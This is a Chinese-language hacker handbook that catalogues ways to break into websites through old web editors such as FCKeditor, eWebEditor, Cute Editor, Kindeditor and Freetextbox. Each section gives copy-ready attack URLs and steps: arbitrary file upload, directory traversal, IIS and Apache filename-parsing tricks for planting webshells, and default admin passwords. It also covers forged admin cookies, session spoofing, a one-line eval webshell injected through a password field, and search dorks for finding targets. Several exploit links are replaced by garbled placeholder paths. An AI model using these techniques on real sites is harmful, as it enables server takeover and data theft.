簡介
#2014年8月21日
最初的手冊版本,是由北洋賤隊的各位朋友收集整理。時隔4年,我們再次整理了這些文件。目的是希望這種傳統(tǒng)能延續(xù)下去。我們相信:星星之火可以燎原。希望大家能多提建議,完善這份手冊。
#2010年某月某日
創(chuàng)建這樣一個文檔是為了能夠使得眾多需要得到幫助的人們,在她們最為困苦之時找到為自己點亮的那盞明燈,雖然這將揭示了某個寂靜黑夜下一群躁動不安的人群.他們在享受快感,享受H4ck W0r|d帶給他們的一切.
作為收集整理此文的修訂者,我懷著無比深邃的怨念參考了諸多資料才使得此物最終誕生,在此感謝整理過程中所有施舍幫助于我的人們.愿他們幸福快樂,虎年如意!
非常希望各位能夠與我聯(lián)系,一并完成本文的創(chuàng)作。
文章目錄
| 編號 | 名稱 | 最后修訂時間 |
|---|---|---|
| 1 | FCKeditor | 2010年 |
| 2 | eWebEditor | 2010年 |
| 3 | Cute Editor | 2010年 |
| 4 | Webhtmleditor | 2010年 |
| 5 | Kindeditor | 2010年 |
| 6 | Freetextbox | 2010年 |
| 7 | Msn editor | 2010年 |
FCKeditor
FCKeditor 編輯器頁
FCKeditor
FCKeditor 編輯器頁
FCKeditor/_samples/default.html FCKeditor/_samples/default.html FCKeditor/_samples/asp/sample01.asp FCKeditor/_samples/asp/sample02.asp FCKeditor/_samples/asp/sample03.asp FCKeditor/_samples/asp/sample04.asp fckeditor/editor/filemanager/connectors/test.html
FCKeditor 查看編輯器版本
FCKeditor/_whatsnew.html
FCKeditor V2.43 版本
FCKeditor/editor/filemanager/browser/default/connectors/php/config.php
FCKeditor V2.6.6版本
FCKeditor/editor/filemanager/connectors/asp/config.php
FCKeditor 匿名上傳文件
影響版本:非優(yōu)化/精簡版本的FCKeditor
脆弱描述:
如果存在以下文件,打開后即可上傳文件。
攻擊利用:
FCKeditor/editor/filemanager/upload/test.html FCKeditor/editor/filemanager/browser/default/connectors/test.html FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector FCKeditor/editor/filemanager/connectors/test.html FCKeditor/editor/filemanager/connectors/uploadtest.html
FCKeditor 查看文件上傳路徑
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
XML頁面中第二行 url=/xxx的部分就是默認基準上傳路徑
Note:
[Hell1]截至2010年02月15日最新版本為FCKeditor v2.6.6
[Hell2]記得修改其中兩處asp為FCKeditor實際使用的腳本語言
FCKeditor被動限制策略所導(dǎo)致的過濾不嚴問題
影響版本: FCKeditor x.x <= FCKeditor v2.4.3
脆弱描述:
FCKeditor v2.4.3中File類別默認拒絕上傳類型:html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|
pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm
Fckeditor 2.0 <= 2.2允許上傳asa、cer、php2、php4、inc、pwml、pht后綴的文件
上傳后 它保存的文件直接用的$sFilePath = $sServerDir . $sFileName,而沒有使用$sExtension為后綴。直接導(dǎo)致在win下在上傳文件后面加個.來突破[未測試]。而在apache下,因為”Apache文件名解析缺陷漏洞”也可以利用之,詳見”附錄A”
另建議其他上傳漏洞中定義TYPE變量時使用File類別來上傳文件,根據(jù)FCKeditor的代碼,其限制最為狹隘。
攻擊利用:
允許其他任何后綴上傳
利用2003路徑解析漏洞上傳木馬
影響版本: 附錄B
脆弱描述:
利用2003系統(tǒng)路徑解析漏洞的原理,創(chuàng)建類似bin.asp如此一般的目錄,再在此目錄中上傳文件即可被腳本解釋器以相應(yīng)腳本權(quán)限執(zhí)行。
攻擊利用:
fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp
強制建立shell.asp目錄:
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/shell.asp&NewFolderName=z&uuid=1244789975684
or
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp
Note:[`Sn4k3!]這個我也不知道咯,有些時候,手動不行,代碼就是能成功,囧。
FCKeditor PHP上傳任意文件漏洞
影響版本: FCKeditor 2.2 <= FCKeditor 2.4.2
脆弱描述:
FCKeditor在處理文件上傳時存在輸入驗證錯誤,遠程攻擊可以利用此漏洞上傳任意文件。
在通過editor/filemanager/upload/php/upload.php上傳文件時攻擊者可以通過為Type參數(shù)定義無效的值導(dǎo)致上傳任意腳本。
成功攻擊要求config.php配置文件中啟用文件上傳,而默認是禁用的。攻擊利用: (請修改action字段為指定網(wǎng)址):
FCKeditor/_whatsnew.html0
Note:如想嘗試v2.2版漏洞,則修改Type=任意值 即可,但注意,如果換回使用Media則必須大寫首字母M,否則LINUX下,F(xiàn)CKeditor會對文件目錄進行文件名校驗,不會上傳成功的。
FCKeditor 暴路徑漏洞
影響版本:aspx版FCKeditor
攻擊利用:
FCKeditor/_whatsnew.html1
FCKeditor 文件上傳“.”變“_”下劃線的繞過方法
影響版本: FCKeditor => 2.4.x
脆弱描述:
我們上傳的文件例如:shell.php.rar或shell.php;.jpg會變?yōu)閟hell_php;.jpg這是新版FCK的變化。
攻擊利用:
FCKeditor/_whatsnew.html2
※不過空格只支持win系統(tǒng) *nix是不支持的[1.php和1.php+空格是2個不同的文件]
Note:http://pstgroup.blogspot.com/2007/05/tipsfckeditor.html
FCKeditor 文件上傳“.”變“_”下劃線的繞過方法(二)
影響版本:=>2.4.x的最新版已修補
脆弱描述:
來源:T00LS.Net
由于Fckeditor對第一次上傳123.asp;123.jpg 這樣的格式做了過濾。也就是IIS6解析漏洞。
上傳第一次。被過濾為123_asp;123.jpg 從而無法運行。
但是第2次上傳同名文件123.asp;123.jpg后。由于”123_asp;123.jpg”已經(jīng)存在。
文件名被命名為123.asp;123(1).jpg …… 123.asp;123(2).jpg這樣的編號方式。
所以。IIS6的漏洞繼續(xù)執(zhí)行了。
如果通過上面的步驟進行測試沒有成功,可能有以下幾方面的原因:
1.FCKeditor沒有開啟文件上傳功能,這項功能在安裝FCKeditor時默認是關(guān)閉的。如果想上傳文件,F(xiàn)CKeditor會給出錯誤提示。
2.網(wǎng)站采用了精簡版的FCKeditor,精簡版的FCKeditor很多功能丟失,包括文件上傳功能。
3.FCKeditor的這個漏洞已經(jīng)被修復(fù)。
FCKeditor 新聞組件遍歷目錄漏洞
影響版本:Aspx與JSP版FCKeditor
脆弱描述:如何獲得webshell請參考上文“TYPE自定義變量任意上傳文件漏洞”
攻擊利用:
修改CurrentFolder參數(shù)使用 ../../來進入不同的目錄
FCKeditor/_whatsnew.html3
根據(jù)返回的XML信息可以查看網(wǎng)站所有的目錄。
FCKeditor/_whatsnew.html4
TYPE自定義變量任意上傳文件漏洞
影響版本: 較早版本
脆弱描述:
通過自定義Type變量的參數(shù),可以創(chuàng)建或上傳文件到指定的目錄中去,且沒有上傳文件格式的限制。
攻擊利用:
FCKeditor/_whatsnew.html5
打開這個地址就可以上傳任何類型的文件了,Shell上傳到的默認位置是:
http://navisec.it/UserFiles/all/1.aspType=all 這個變量是自定義的,在這里創(chuàng)建了all這個目錄,而且新的目錄沒有上傳文件格式的限制.
比如輸入:
FCKeditor/_whatsnew.html6
網(wǎng)馬就可以傳到網(wǎng)站的根目錄下.
Note:如找不到默認上傳文件夾可檢查此文件:
FCKeditor/_whatsnew.html7
eWebEditor
eWebEditor 基礎(chǔ)知識
默認后臺地址:
/ewebeditor/admin_login.asp
/WebEdior/admin/login.aspx
建議最好檢測下admin_style.asp文件是否可以直接訪問
默認數(shù)據(jù)庫路徑:
FCKeditor/_whatsnew.html8
默認密碼:
admin/admin888 、 admin/admin、 admin/123456 、admin/admin999
點擊“樣式管理”—可以選擇新增樣式,或者修改一個非系統(tǒng)樣式,將其中圖片控件所允許的上傳類型后面加上|asp、|asa、|aaspsp或|cer,只要是服務(wù)器允許執(zhí)行的腳本類型即可,點擊“提交”并設(shè)置工具欄—將“插入圖片”控件添加上。而后—預(yù)覽此樣式,點擊插入圖片,上傳WEBSHELL,在“代碼”模式中查看上傳文件的路徑。
2、當數(shù)據(jù)庫被管理員修改為asp、asa后綴的時候,可以插一句話木馬服務(wù)端進入數(shù)據(jù)庫,然后一句話木馬客戶端連接拿下webshell
3、上傳后無法執(zhí)行?目錄沒權(quán)限?帥鍋你回去樣式管理看你編輯過的那個樣式,里面可以自定義上傳路徑的!!!
4、設(shè)置好了上傳類型,依然上傳不了麼?估計是文件代碼被改了,可以嘗試設(shè)定“遠程類型”依照6.0版本拿SHELL的方法來做(詳情見下文↓),能夠設(shè)定自動保存遠程文件的類型。
5、不能添加工具欄,但設(shè)定好了某樣式中的文件類型,怎么辦?↓這么辦!
(請修改action字段)
Action.html
6、需要突破上傳文件類型限制么?Come here! —>> 將圖片上傳類型修改為“aaspsp;”(不含引號),將一句話shell文件名改為“1.asp;”(不含引號)并上傳即可。—>本條信息來源:微笑刺客
eWebEditor 可下載數(shù)據(jù)庫,但密文解不開
脆弱描述:
當我們下載數(shù)據(jù)庫后查詢不到密碼MD5的明文時,可以去看看webeditor_style(14)這個樣式表,看看是否有前輩入侵過 或許已經(jīng)賦予了某控件上傳腳本的能力,構(gòu)造地址來上傳我們自己的WEBSHELL.
攻擊利用:
比如 ID=46 s-name =standard1
構(gòu)造 代碼: ewebeditor.asp?id=content&style=standard
ID和和樣式名改過后
ewebeditor.asp?id=46&style=standard1
eWebEditor遍歷目錄漏洞
脆弱描述:
ewebeditor/admin_uploadfile.asp
admin/upload.asp
過濾不嚴,造成遍歷目錄漏洞
攻擊利用:
第一種:ewebeditor/admin_uploadfile.asp?id=14
在id=14后面添加&dir=..
再加 &dir=../..
&dir=http://navisec.it/../.. 看到整個網(wǎng)站文件了
第二種: ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir =./..
eWebEditor 5.2 列目錄漏洞
脆弱描述:
ewebeditor/asp/browse.asp
過濾不嚴,造成遍歷目錄漏洞
攻擊利用:
http://navisec.it/ewebeditor/asp/browse.asp?style=standard650&dir=…././/..
利用eWebEditor session欺騙漏洞,進入后臺
脆弱描述:
漏洞文件:Admin_Private.asp
只判斷了session,沒有判斷cookies和路徑的驗證問題。
攻擊利用:
新建一個test.asp內(nèi)容如下:
<%Session(“eWebEditor_User”) = “11111111”%>
訪問test.asp,再訪問后臺任何文件,for example:Admin_Default.asp
eWebEditor asp版 2.1.6 上傳漏洞
攻擊利用:(請修改action字段為指定網(wǎng)址)
ewebeditor asp版2.1.6上傳漏洞利用程序.html
eWebEditor 2.7.0 注入漏洞
攻擊利用:
http://navisec.it/ewebeditor/ewebeditor.asp?id=article_content&style=full_v200
默認表名:eWebEditor_System默認列名:sys_UserName、sys_UserPass,然后利用nbsi進行猜解.
eWebEditor2.8.0最終版刪除任意文件漏洞
脆弱描述:
此漏洞存在于Example\NewsSystem目錄下的delete.asp文件中,這是ewebeditor的測試頁面,無須登陸可以直接進入。
攻擊利用: (請修改action字段為指定網(wǎng)址)
Del Files.html
eWebEditor PHP/ASP 后臺通殺漏洞
影響版本: PHP ≥ 3.0~3.8與asp 2.8版也通用,或許低版本也可以,有待測試。
攻擊利用:
進入后臺/eWebEditor/admin/login.php,隨便輸入一個用戶和密碼,會提示出錯了.
這時候你清空瀏覽器的url,然后輸入
javascript:alert(document.cookie=”adminuser=”+escape(“admin”));
javascript:alert(document.cookie=”adminpass=”+escape(“admin”));
javascript:alert(document.cookie=”admindj=”+escape(“1”));
而后三次回車,清空瀏覽器的URL,現(xiàn)在輸入一些平常訪問不到的文件如../ewebeditor/admin/default.php,就會直接進去。
eWebEditor for php任意文件上傳漏洞
影響版本:ewebeditor php v3.8 or older version
脆弱描述:
此版本將所有的風格配置信息保存為一個數(shù)組$aStyle,在php.ini配置register_global為on的情況下我們可以任意添加自己喜歡的風格,并定義上傳類型。
攻擊利用:
phpupload.html
eWebEditor JSP版漏洞
大同小異,我在本文檔不想多說了,因為沒環(huán)境 測試,網(wǎng)上垃圾場那么大,不好排查。用JSP編輯器的我覺得eweb會比FCKeditor份額少得多。
eWebEditor 2.8 商業(yè)版插一句話木馬
影響版本:=>2.8 商業(yè)版
攻擊利用:
登陸后臺,點擊修改密碼—-新密碼設(shè)置為 1":eval request("h")’
設(shè)置成功后,訪問asp/config.asp文件即可,一句話木馬被寫入到這個文件里面了.
注意:可能因為轉(zhuǎn)載的關(guān)系,代碼會變掉,最好本地調(diào)試好代碼再提交。
eWebEditorNet upload.aspx 上傳漏洞(WebEditorNet)
脆弱描述:
WebEditorNet 主要是一個upload.aspx文件存在上傳漏洞。
攻擊利用:
默認上傳地址:/ewebeditornet/upload.aspx
可以直接上傳一個cer的木馬
如果不能上傳則在瀏覽器地址欄中輸入javascript:lbtnUpload.click();
成功以后查看源代碼找到uploadsave查看上傳保存地址,默認傳到uploadfile這個文件夾里。
southidceditor(一般使用v2.8.0版eWeb核心)
http://navisec.it/admin/southidceditor/datas/southidceditor.mdb
http://navisec.it/admin/southidceditor/admin/admin_login.asp
http://navisec.it/admin/southidceditor/popup.asp
bigcneditor(eWeb 2.7.5 VIP核心)
其實所謂的Bigcneditor就是eWebEditor 2.7.5的VIP用戶版.之所以無法訪問admin_login.asp,提示“權(quán)限不夠”4字真言,估計就是因為其授權(quán)“Licensed”問題,或許只允許被授權(quán)的機器訪問后臺才對。
或許上面針對eWebEditor v2.8以下低版本的小動作可以用到這上面來.貌似沒多少動作??
Cute Editor
Cute Editor在線編輯器本地包含漏洞
影響版本:
CuteEditor For Net 6.4
脆弱描述:
可以隨意查看網(wǎng)站文件內(nèi)容,危害較大。
攻擊利用:
http://navisec.it/CuteSoft_Client/CuteEditor/Load.ashx?type=image&file=../../../web.config
Cute Editor Asp.Net版利用iis解析漏洞獲得權(quán)限
影響版本:
CuteEditor for ASP.NET中文版脆弱描述:
脆弱描述:
CuteEditor對上傳文件名未重命名,導(dǎo)致其可利用IIS文件名解析Bug獲得webshell權(quán)限。
攻擊利用:
可通過在搜索引擎中鍵入關(guān)鍵字 inurl:Post.aspx?SmallClassID= 來找到測試目標。
在編輯器中點擊“多媒體插入”,上傳一個名為“xxx.asp;.avi”的網(wǎng)馬,以此獲得權(quán)限。
Webhtmleditor
利用WIN 2003 IIS文件名稱解析漏洞獲得SHELL
影響版本:<= Webhtmleditor最終版1.7 (已停止更新)
脆弱描述/攻擊利用:
對上傳的圖片或其他文件無重命名操作,導(dǎo)致允許惡意用戶上傳diy.asp;.jpg來繞過對后綴名審查的限制,對于此類因編輯器作者意識犯下的錯誤,就算遭遇縮略圖,文件頭檢測,也可使用圖片木馬 插入一句話來突破。
Kindeditor
利用WIN 2003 IIS文件名稱解析漏洞獲得SHELL
影響版本: <= kindeditor 3.2.1(09年8月份發(fā)布的最新版)
脆弱描述/攻擊利用:
拿官方做個演示:進入http://navisec.it/ke/examples/index.html 隨意點擊一個demo后點圖片上傳,某君上傳了如下文件:http://navisec.it/ke/attached/test.asp;.jpg 大家可以前去圍觀。(現(xiàn)已失效,請速至老琴房彈奏《Secret》回到09年8月份觀看)
Note:參見附錄C原理解析。
Freetextbox
Freetextbox遍歷目錄漏洞
影響版本:未知
脆弱描述:
因為ftb.imagegallery.aspx代碼中 只過濾了/但是沒有過濾\符號所以導(dǎo)致出現(xiàn)了遍歷目錄的問題。
攻擊利用:
在編輯器頁面點圖片會彈出一個框(抓包得到此地址)構(gòu)造如下,可遍歷目錄。
http://navisec.it/Member/images/ftb/HelperScripts/ftb.imagegallery.aspx?frame=1&rif=..&cif=\..
Freetextbox Asp.Net版利用IIS解析漏洞獲得權(quán)限
影響版本:所有版本
脆弱描述:
沒做登陸驗證可以直接訪問上傳木馬
Freetextbox 3-3-1 可以直接上傳任意格式的文件
Freetextbox 1.6.3 及其他版本可以上傳 格式為x.asp;.jpg
攻擊利用:
利用IIS解析漏洞拿SHELL。上傳后SHELL的路徑為http://navisec.it/images/x.asp;.jpg
Msn editor
利用WIN 2003 IIS文件名稱解析漏洞獲得SHELL
影響版本:未知
脆弱描述:
點擊圖片上傳后會出現(xiàn)上傳頁面,地址為
http://navisec.it/admin/uploadPic.asp?language=&editImageNum=0&editRemNum=
用普通的圖片上傳后,地址為
http://navisec.it/news/uppic/41513102009204012_1.gif
記住這時候的路徑,再點擊圖片的上傳,這時候地址就變成了
http://navisec.it/news/admin/uploadPic.asp?language=&editImageNum=1&editRemNum=41513102009204012
很明顯。圖片的地址是根據(jù)RemNum后面的編號生成的。
攻擊利用:
配合IIS的解析漏洞,把RemNum后面的數(shù)據(jù)修改為1.asp;41513102009204012,變成下面這個地址
http://navisec.it/admin/uploadPic.asp?language=&editImageNum=0&editRemNum=1.asp;41513102009204012
然后在瀏覽器里打開,然后選擇你的腳本木馬上傳,將會返回下面的地址
uppic/1.asp;41513102009204012_2.gif
直接打開就是我們的小馬地址!
附錄
附錄A – Apache文件名解析缺陷漏洞
測試環(huán)境:apache 2.0.53 winxp,apache 2.0.52 redhat linux
1.國外(SSR TEAM)發(fā)了多個advisory稱Apache’s MIME module (mod_mime)相關(guān)漏洞,就是attack.php.rar會被當做php文件執(zhí)行的漏洞,包括Discuz!那個p11.php.php.php.php.php.php.php.php.php.php.php.php.rar漏洞。
2.S4T的superhei在blog上發(fā)布了這個apache的小特性,即apache 是從后面開始檢查后綴,按最后一個合法后綴執(zhí)行。其實只要看一下apache的htdocs那些默認安裝的index.XX文件就明白了。
3.superhei已經(jīng)說的非常清楚了,可以充分利用在上傳漏洞上,我按照普遍允許上傳的文件格式測試了一下,列舉如下(亂分類勿怪)
典型型:rar
備份型:bak,lock
流媒體型:wma,wmv,asx,as,mp4,rmvb
微軟型:sql,chm,hlp,shtml,asp
任意型:test,fake,ph4nt0m
特殊型:torrent
程序型:jsp,c,cpp,pl,cgi
4.整個漏洞的關(guān)鍵就是apache的”合法后綴”到底是哪些,不是”合法后綴”的都可以被利用。
5.測試環(huán)境
a.php
<? phpinfo();?>
然后增加任意后綴測試,a.php.aaa,a.php.aab….
By cloie, in ph4nt0m.net(c) Security.
附錄B – iis文件夾名,解析漏洞
安裝了iis6的服務(wù)器(windows2003),受影響的文件名后綴
有.asp .asa .cdx .cer .pl .php .cgi
Windows 2003 Enterprise Edition是微軟目前主流的服務(wù)器操作系統(tǒng)。 Windows 2003 IIS6 存在著文件解析路徑的漏洞,當文件夾名為類似hack.asp的時候(即文件夾名看起來像一個ASP文件的文件名),此時此文件夾下的任何類型的文件(比如.gif,.jpg,.txt等)都可以在IIS中被當做ASP程序來執(zhí)行。這樣黑客即可上傳擴展名為jpg或gif之類的看起來像是圖片文件的木馬文件,通過訪問這個文件即可運行木馬。如果這些網(wǎng)站中有任何一個文件夾的名字是以 .asp .php .cer .asa .cgi .pl 等結(jié)尾,那么放在這些文件夾下面的任何類型的文件都有可能被認為是腳本文件而交給腳本解析器而執(zhí)行。
附錄C – iis文件名,解析漏洞
漏洞描述:
當文件名為[YYY].asp;[ZZZ].jpg時,Microsoft IIS會自動以asp格式來進行解析。
而當文件名為[YYY].php;[ZZZ].jpg時,Microsoft IIS會自動以php格式來進行解析。
其中[YYY]與[ZZZ]處為可變化字符串。
影響平臺:
Windows Server 2000 / 2003 / 2003 R2 (IIS 5.x / 6.0)
修補方法:
1、等待微軟相關(guān)的補丁包
2、關(guān)閉圖片所在目錄的腳本執(zhí)行權(quán)限(前提是你的某些圖片沒有與程序混合存放)
3、校驗網(wǎng)站程序中所有上傳圖片的代碼段,對形如[YYY].asp;[ZZZ].jpg的圖片做攔截
備注:
對于Windows Server 2008(IIS7)以及Windows Server 2008 R2(IIS7.5) 則未受影響
Note:(FW) for http://www.cnblogs.com/webserverguard/archive/2009/09/14/1566597.html
其他
Version
1.3
編輯人員
北洋賤隊@Bbs.SecEye.Org:
MIAO、豬哥靚、Hell-Phantom、Liange、Fjhh、GxM、Sn4k3! 、微笑刺客……
聯(lián)系方式
navisec@163.com
security0day@gmail.com (old)
本手冊原地址: https://docs.google.com/document/d/1w_61xR8U7nmn4Y0CvBHpG1uFIU2ORx69QnqTxQt8Km0/edit?pli=1
